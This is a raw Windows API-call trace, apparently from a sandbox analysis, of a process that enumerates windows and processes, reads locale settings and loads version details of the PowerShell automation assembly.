	[0276.861] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x28db18 | out: lpExitCode=0x28db18*=0x103) returned 1
	[0276.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12afb088, Length=0x20000, ResultLength=0x28dae0 | out: SystemInformation=0x12afb088, ResultLength=0x28dae0*=0x133d0) returned 0x0
	[0276.882] EnumWindows (lpEnumFunc=0x29b66ac, lParam=0x0) returned 1
	[0278.622] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0278.886] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x558
	[0279.274] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.274] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x538
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x778
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x778
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.275] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xaac
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x3d0
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x978
	[0279.276] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa7c
	[0279.277] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x59c
	[0279.277] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa88
	[0279.277] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa6c
	[0279.277] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa68
	[0279.278] GetWindow (hWnd=0x10214, uCmd=0x4) returned 0x0
	[0279.278] IsWindowVisible (hWnd=0x10214) returned 0
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x9f8
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa04
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x924
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x8dc
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7dc
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x768
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x764
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x820
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x810
	[0279.279] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x794
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x83c
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7ac
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb44
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb5c
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x838
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.280] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x818
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x5b8
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x494
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x1ec
	[0279.281] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x440
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7e8
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x730
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x2c8
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x31c
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x330
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x128
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x5c8
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x6f8
	[0279.282] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x358
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x73c
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb0
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x250
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x240
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x790
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x61c
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x540
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x538
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x568
	[0279.283] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x538
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x568
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x538
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x540
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x540
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x510
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x57c
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x554
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x528
	[0279.284] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x79c
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4e0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x44c
	[0279.285] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x778
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x558
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4d0
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb3c
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa90
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xad0
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa9c
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xaa0
	[0279.286] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb1c
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7e0
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa74
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x694
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xa28
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x9b0
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x8d8
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x940
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x93c
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4ec
	[0279.287] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x150
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x720
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x3c4
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7d4
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x6c8
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb54
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb54
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb5c
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x838
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x818
	[0279.288] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x5b8
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x494
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x1ec
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x440
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x7e8
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x730
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x2c8
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x31c
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x330
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x128
	[0279.289] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x5c8
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x6f8
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x358
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x73c
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0xb0
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x250
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x240
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x790
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x61c
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x568
	[0279.290] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x538
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x540
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x510
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x79c
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x4e0
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x460
	[0279.291] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x28d840 | out: lpdwProcessId=0x28d840) returned 0x778
	[0279.295] WerSetFlags () returned 0x0
	[0279.302] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0279.303] CoTaskMemFree (pv=0x0) 
	[0279.304] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28dba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28dba0 | out: pulNumLanguages=0x28dba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28dba0) returned 1
	[0279.304] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28dba8, pwszLanguagesBuffer=0x2b25bd0, pcchLanguagesBuffer=0x28dba0 | out: pulNumLanguages=0x28dba8, pwszLanguagesBuffer=0x2b25bd0, pcchLanguagesBuffer=0x28dba0) returned 1
	[0279.309] CoTaskMemAlloc (cb=0x24) returned 0x14a110
	[0279.309] GetUserDefaultLocaleName (in: lpLocaleName=0x14a110, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0279.309] CoTaskMemFree (pv=0x14a110) 
	[0279.973] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0279.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.973] CoTaskMemFree (pv=0xed0a0) 
	[0279.974] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0279.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.974] CoTaskMemFree (pv=0xed0a0) 
	[0279.976] CoTaskMemAlloc (cb=0x104) returned 0xed0a0
	[0279.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.976] CoTaskMemFree (pv=0xed0a0) 
	[0279.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0279.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0279.984] SetErrorMode (uMode=0x1) returned 0x1
	[0279.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28d820 | out: lpFileInformation=0x28d820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0279.984] SetErrorMode (uMode=0x1) returned 0x1
	[0279.985] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28da90 | out: lpdwHandle=0x28da90) returned 0x94c
	[0279.985] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b29460 | out: lpData=0x2b29460) returned 1
	[0279.986] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28da08, puLen=0x28da00 | out: lplpBuffer=0x28da08*=0x2b294fc, puLen=0x28da00) returned 1
	[0279.986] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b295d8, puLen=0x28d970) returned 1
	[0279.986] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0279.986] CoTaskMemAlloc (cb=0x2e) returned 0x1549f0
	[0279.986] lstrcpyW (in: lpString1=0x1549f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0279.986] CoTaskMemFree (pv=0x1549f0) 
	[0279.986] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b2962c, puLen=0x28d970) returned 1
	[0279.986] lstrlenW (lpString="System.Management.Automation") returned 28
	[0279.986] CoTaskMemAlloc (cb=0x3c) returned 0x1557d0
	[0279.986] lstrcpyW (in: lpString1=0x1557d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0279.986] CoTaskMemFree (pv=0x1557d0) 
	[0279.986] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b29688, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0279.987] CoTaskMemAlloc (cb=0x20) returned 0x152c70
	[0279.987] lstrcpyW (in: lpString1=0x152c70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0279.987] CoTaskMemFree (pv=0x152c70) 
	[0279.987] VerQueryValueW (in: pBlock=0x2b29460, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28d978, puLen=0x28d970 | out: lplpBuffer=0x28d978*=0x2b296c8, puLen=0x28d970) returned 1
	[0279.987] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0279.987] CoTaskMemAlloc (cb=0x44) returned 0x1557d0
